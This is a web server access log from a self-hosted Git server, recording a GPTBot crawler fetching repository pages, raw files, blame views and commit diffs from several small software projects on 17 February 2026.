"/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:14:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 465] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" -[17/Feb/2026:14:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:14:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" -[17/Feb/2026:14:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 10425] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" -[17/Feb/2026:14:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2fobj%2fDebug" [Client 74.7.227.38] [Length 25375] [Gzip 5.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug" -[17/Feb/2026:14:46:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 15490] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:14:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:46:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10194] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build" -[17/Feb/2026:14:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:46:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:14:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11673] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" -[17/Feb/2026:14:46:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11674] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" -[17/Feb/2026:14:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build" -[17/Feb/2026:14:46:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11674] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" -[17/Feb/2026:14:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10194] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build" -[17/Feb/2026:14:46:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/asset_pilot_orangepi.tar.gz" -[17/Feb/2026:14:46:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2fvite.config.ts" [Client 74.7.227.38] [Length 23743] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" -[17/Feb/2026:14:46:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10949] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:14:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 316829] [Gzip 14.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main?show-outdated=&style=split&whitespace=ignore-eol" -[17/Feb/2026:14:46:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 23289] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" -[17/Feb/2026:14:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11207] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" -[17/Feb/2026:14:46:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:46:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:46:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:46:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10772] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10771] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:46:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9939] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14332] [Gzip 8.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:46:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10771] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:46:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10243] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:46:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:46:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 11237] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv" -[17/Feb/2026:14:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" -[17/Feb/2026:14:46:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" -[17/Feb/2026:14:46:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10846] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" -[17/Feb/2026:14:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -[17/Feb/2026:14:46:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" -[17/Feb/2026:14:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" -[17/Feb/2026:14:46:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10850] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" -[17/Feb/2026:14:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72035] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" -[17/Feb/2026:14:46:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10500] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:14:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 211035] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:14:46:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10274] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:46:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/pyvenv.cfg" 